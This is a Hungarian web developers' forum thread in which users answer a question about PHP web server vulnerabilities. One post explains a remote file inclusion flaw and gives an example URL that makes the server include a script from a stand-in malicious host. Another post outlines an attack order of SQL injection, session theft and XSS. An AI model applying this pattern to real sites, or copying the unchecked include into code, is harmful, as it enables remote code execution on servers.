Hirdetés
- Lalikiraly: Kaáli Autó-Motor Múzeum
- gban: Ingyen kellene, de tegnapra
- Brogyi: CTEK akkumulátor töltő és másolatai
- Luck Dragon: Asszociációs játék. :)
- sziku69: Szólánc.
- WireGuard VPN a mindennapokra
- GoodSpeed: Ágymatrac keresési kálvária
- sh4d0w: StarWars: Felismerés
- Meggyi001: Kórházi ellátás: kuka vagy finom?
- Sub-ZeRo: Euro Truck Simulator 2 & American Truck Simulator 1 (esetleg 2 majd, ha lesz) :)
Új hozzászólás Aktív témák
-
disy68
aktív tag
válasz
MacCaine
#18710
üzenetére
RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.
Pl: oldal.hu/aloldal
htaccess-el volt egy átirányítás
RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogyinclude_once('http://gonoszoldal.hu/meggonoszabb_script.php
'); -
disy68
aktív tag
válasz
MacCaine
#18705
üzenetére
Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról. -
DNReNTi
őstag
válasz
MacCaine
#18705
üzenetére
Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit. -
disy68
aktív tag
-
DNReNTi
őstag
válasz
MacCaine
#18700
üzenetére
Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen.
Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat. -
De ha lenne ilyen topik, en olvasgatnam.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.
Ejnye.Új hozzászólás Aktív témák
- -ÚJ,2 ÉV GAR- GAMER PC: RYZEN 7 5700/5800X +RX 6600/6700XT +16-64GB DDR4! SZÁMLA! 70 féle ház!
- Üzletből, garanciával, DeLL Inspiron 16 5630 -i5-1340P-16 szál/16RAM/512SSD/16,1"FULLHD IPS
- -ÚJ,2 ÉV GAR- GAMER PC: i5-14400F (10mag/16szál) +RX 6600/6700XT +16-64GB DDR4! SZÁMLA! 70 féle ház!
- Thrustmaster T-GT II bázis - Thrustmaster Sparco P310 - Thrustmaster T3PM pedál - Playseat Evolution
- Asus H110M2 D3 LGA 1151 alaplap
- Samsung Bluetooth Mouse Slim egér
- HIBÁTLAN iPhone 13 Pro Max 256GB Gold -1 ÉV GARANCIA - Kártyafüggetlen, MS3685 100% Akkumulátor
- HP Omen 80G8E9 - 27" IPS - UHD 4K - 144Hz 1ms - NVIDIA G-Sync - FreeSync - HDR 400 - USB Type-C
- ÁRGARANCIA!Épített KomPhone Ryzen 5 7600X 32/64GB RAM RTX 5060 Ti 16GB GAMER PC termékbeszámítással
- Akciós Windows 10 pro + Office 2019 professional plus csomag AZONNALI SZÁLLÍTÁS
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest